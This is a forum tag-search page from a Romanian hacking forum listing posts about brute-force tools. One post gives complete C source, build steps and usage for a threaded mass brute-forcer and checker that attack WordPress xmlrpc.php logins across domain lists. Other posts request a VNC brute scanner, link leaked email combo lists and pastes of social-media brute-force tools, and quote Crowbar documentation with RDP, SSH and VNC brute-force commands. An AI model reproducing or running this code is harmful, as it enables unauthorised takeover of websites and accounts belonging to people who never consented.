Jump to content

Search the Community

Showing results for tags 'brute'.

The search index is currently processing. Current results may not be complete.
  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 8 results

  1. standard description. On the HTTP proxy works fine. // link removed
  2. Salut , vreau si eu un scanner (brute ) pt vncuri - contra cost nu degeaba ceva cum era inainte nvnc , mentionez ca vubrute nu imi merge tocami ok...) Multumesc frumos !
  3. mRemoteNG is a fork of mRemote, an open source, tabbed, multi-protocol, remote connections manager. mRemoteNG adds bug fixes and new features to mRemote. It allows you to view all of your remote connections in a simple yet powerful tabbed interface. mRemoteNG supports the following protocols: RDP (Remote Desktop/Terminal Server) VNC (Virtual Network Computing) ICA (Citrix Independent Computing Architecture) SSH (Secure Shell) Telnet (TELecommunication NETwork) HTTP/HTTPS (Hypertext Transfer Protocol) rlogin Raw Socket Connections mRemoteNG Installer http://downloads.mremoteng.org/mRemoteNG-Installer-1.72.exe mRemoteNG Portable Edition http://downloads.mremoteng.org/mRemoteNG-Portable-1.72.zip
  4. Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php. ===== brute.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE WP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[1024], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>"); strcat(postvar, pass); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd,buffer,2047); if (n < 0) { exit(1); } if(strstr(buffer, "isAdmin")) { printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass); outfile = fopen("wp.log", "a+"); fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass); fclose(outfile); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000]; processed[0]=0; time_t start; if (argc < 5) usage(argv[0]); printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); if(!(userfile = fopen(argv[2], "r"))) { printf("INVALID USERS FILE: %s\n", argv[2]); exit(0); } fclose(userfile); if(!(passfile = fopen(argv[3], "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+"); fclose(badfile); if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+"); fclose(badfile); userfile = fopen(argv[2], "r"); while(1) { if(!fgets((char *)&user, sizeof(user), userfile)) break; if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0'; if (user) { passfile = fopen(argv[3], "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass) { badfile = fopen("wp.log", "r"); strcpy(processed, ""); while (1) { if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break; strcat(processed, invtmp); } fclose(badfile); ipfile = fopen(argv[1], "r"); while (1) { if(!fgets((char *)&tok, sizeof(tok), ipfile)) break; if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0'; if (tok) { char ip2[256], pass2[256]; ip = strtok(tok, " "); link = strtok(NULL, " "); strcpy(ip2, ip); strcpy(pass2, pass); if(strstr(pass2, "DOMAIN%")) { if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0'; if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0'; if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0'; if(strstr(ip2, "www.")) { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=4;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } else { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=0;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } } if(!strstr(processed, ip)) { if(!(fork())) { getvuln(ip,user,pass2,outfile,link); exit(0); } else { numforks++; if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL); } } } } fclose(ipfile); } } fclose(passfile); } } fclose(userfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } ===== checker.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *link, FILE *outfile); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE SMTP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <IPs file> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *link, FILE *outfile) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[2048], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55"); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd, buffer, 2047); if (n < 0) { exit(1); } if(strstr(buffer, "<int>403</int>")) { printf("[+]Found: %s - %s\n", victim, link); fprintf(outfile, "%s %s\n", victim, link); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char ip[1024]; time_t start; if (argc < 2) usage(argv[0]); outfile = fopen("out.log", "a+"); printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0'; if (ip) { if(!(fork())) { getvuln(ip,"/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } if(!(fork())) { getvuln(ip,"/blog/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } } } fclose(ipfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } Pentru compilare: gcc -o checker checker.c gcc -o brute brute.c Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log. Usage: ./checker <IPs file> <threads> Pentru a incepe brute faceti o lista de useri, una de parole si porniti: ./brute out.log users.txt passwords.txt <threads> Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400. Astept sugestii
  5. N-am incercat insa mi-au confirmat mai multi pe un alt forum ca se poate. Video-ul este in spaniola asa ca daca nu intelegeti...Pause -> Google Translate PS: Trebuie sa aveti ceva rami cumva brute force-ul umple memoria ram cam la 10.000 de incercari papa vreo 6 GB Ram https://www.youtube.com/watch?v=mA0rZIwEMwk&feature=player_detailpage
  6. Hosting si Adult ! hosting si porno vip - Pastebin.com Zippyshare.com - E-mails-4.txt Zippyshare.com - Fresh%20HQ%20Email%20Combo%20List.txt Zippyshare.com - 12286 US Combos-mail.txt US Zippyshare.com - Fresh HQ Email Combo List 552014.txt
  7. [+] AnonGhost Auto SQLi Query Maker [+] https://ghostbin.com/paste/hd26gkco [+] Facebook XMPP Chat Protocol Bruteforce [+] https://ghostbin.com/paste/oynf9bt2 [+] Facebook Brute Reset Codel [+] https://ghostbin.com/paste/e5te5umj [+] Ftp Brute Force [+] https://ghostbin.com/paste/3sxovcuh/edit [+] Facebook Pentester [+] https://ghostbin.com/paste/qyns3ox7 [+] Twitter Brute Force [+] https://ghostbin.com/paste/nubyt3vh Password = ./d3f4ult_v1rUsa
  8. What is it? Crowbar (crowbar) is brute forcing tool that can be used during penetration tests. It is developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example, while most brute forcing tools use username and password for SSH brute force, Crowbar uses SSH key. So SSH keys, that are obtained during penetration tests, can be used to attack other SSH servers. Currently Crowbar supports OpenVPN SSH private key authentication VNC key authentication Remote Desktop Protocol (RDP) with NLA support Installation First you shoud install dependencies # apt-get install openvpn freerdp-x11 vncviewer Then get latest version from github # git clone https://github.com/galkan/crowbar Attention: Rdp depends on your Kali version. It may be xfreerdp for the latest version. Usage -h: Shows help menu. -b: Target service. Crowbar now supports vnckey, openvpn, sshkey, rdp. -s: Target ip address. -S: File name which is stores target ip address. -u: Username. -U: File name which stores username list. -n: Thread count. -l: File name which stores log. Deafault file name is crwobar.log which is located in your current directory -o: Output file name which stores the successfully attempt. -c: Password. -C: File name which stores passwords list. -t: Timeout value. -p: Port number -k: Key file full path. -m: Openvpn configuration file path -d: Run nmap in order to discover whether the target port is open or not. So that you can easily brute to target using crowbar. -v: Verbose mode which is shows all the attempts including fail. If you want see all usage options, please use crowbar --help Brute forcing RDP Below are the examples which you have options for using crowbar. RDP brute force attempt to a single IP address using a single username and a single password: crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 RDP brute force attempt to a single IP address using username list file and a single password crowbar.py -b rdp -s 192.168.2.211/32 -U /root/Desktop/userlist -c passw0rd RDP brute force attempt to a single IP address using a single username and a password list: crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C /root/Desktop/passlist Brute forcing SSH Below are the examples which you have options for using crowbar. SSH key brute force attempt to a single IP address using a single username and a ssh key: crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/id_rsa SSH key brute force attempt to a single IP address using a single username and a ssh key folder: crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/ SSH key brute force attempt to a network using a single username and a ssh key folder in discovery mode: crowbar.py -b sshkey -s 192.168.2.0/24 -u root -k /root/.ssh/ -d Attention: If you want, you can specify the key directory with -k option. Crowbar will use all the files under this directory for brute force. For instance; # crowbar.py -k /root/.ssh Brute forcing VNC server Below is the example which you have options for using crowbar. VNC brute force attempt to a single IP address using a passwd file with specified port number: crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k /root/.vnc/passwd Brute forcing OpenVPN Below are the example which you have options for using crowbar. VPN brute force attempt to a single IP address using a configuration file, a certificate file, a single username and a sindle password with specified port number: crowbar.py -b openvpn -s 198.7.62.204/32 -p 443 -m /root/Desktop/vpnbook.ovpn -k /root/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF Example Output Once you have executed crowbar, it generates 2 files for logging and result that are located in your current directory. Default log file name is crowbar.log which stores all brute force attempts while execution. If you don't want use default log file, you should use -l log_path. The second file is crowbar.out which stores successful attempts while execution. If you don't want use default output file, you should use -o output_path. After that you can observe crowbar operations. Please look at the crowbar.log and crowbar.out files. Download: https://github.com/galkan/crowbar
×
×
  • Create New...